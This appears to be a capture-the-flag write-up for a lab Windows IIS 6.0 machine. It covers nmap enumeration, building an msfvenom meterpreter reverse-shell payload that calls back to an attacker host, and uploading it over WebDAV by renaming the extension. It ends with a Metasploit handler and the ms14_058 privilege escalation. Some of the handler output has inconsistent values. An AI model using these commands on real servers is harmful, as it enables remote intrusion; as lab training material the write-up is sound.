Introduction

OS: Windows
Difficulty: Easy
Points: 0
Release: 12 Apr, 2017
IP: 10.10.10.15

Enumeration

Nmap scan result

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Nmap scan report for 10.10.10.15
Host is up (0.064s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Server Date: Mon, 11 Sep 2023 13:12:46 GMT
|   Server Type: Microsoft-IIS/6.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.33 seconds

With nmap scan result we found that the webdav service is enabled.
To conifrm the webdav service we used davtest.
davtest -url http://10.10.10.15
Reference:

User Shell

As we know that webdav allows file uploads in webserver so we are going to upload the aspx meterpreter rev shell.
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.9 lport=1111 -f aspx -o shell.aspx
To upload file we used cadaver

1
2
3
4
5
6
7
8
9
10
$ cadaver 10.10.10.15:80
dav:/> put shell.aspx 
Uploading shell.aspx to `/shell.aspx':
Progress: [=============================>] 100.0% of 2851 bytes failed:
403 Forbidden.
dav:/> put shell.txt 
Uploading shell.txt to `/shell.txt':
Progress: [=============================>] 100.0% of 2851 bytes succeeded.
dav:/> copy shell.txt shell.aspx
Copying `/shell.txt' to `/shell.aspx':  succeeded.

but it restrict the file extensions like aspx and asp so we renamed the shell.aspx to shell.txt upload it into the server then change the file extension to original using copy command.
Now set up the payload handler

1
2
3
4
5
6
7
8
9
10
11
12
$ ./msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost tun0
lhost => 192.168.1.123
msf exploit(handler) > set lport 1111
lport => 4444
msf exploit(handler) > run

[*] Started reverse handler on 10.10.14.x:1111
[*] Starting the payload handler...

To trigger reverse shell open the link http://10.10.10.15/shell.aspx
we got meterpreter shell.

Root Shell

As it is a windows machine i directly run the exploit suggester in metasploit
post/multi/recon/local_exploit_suggester

It suggested like 8+ exploits so i decided to run one by one.
first try we got the root shell using this exploit
use windows/local/ms14_058_track_popup_menu

1
2
3
4
5
C:\>type "C:\Documents and Settings\Lakis\Desktop\user.txt"
xxxxxx...

C:\>type "C:\Documents and Settings\Administrator\Desktop\root.txt"
xxxxxx...

We got the user and root flag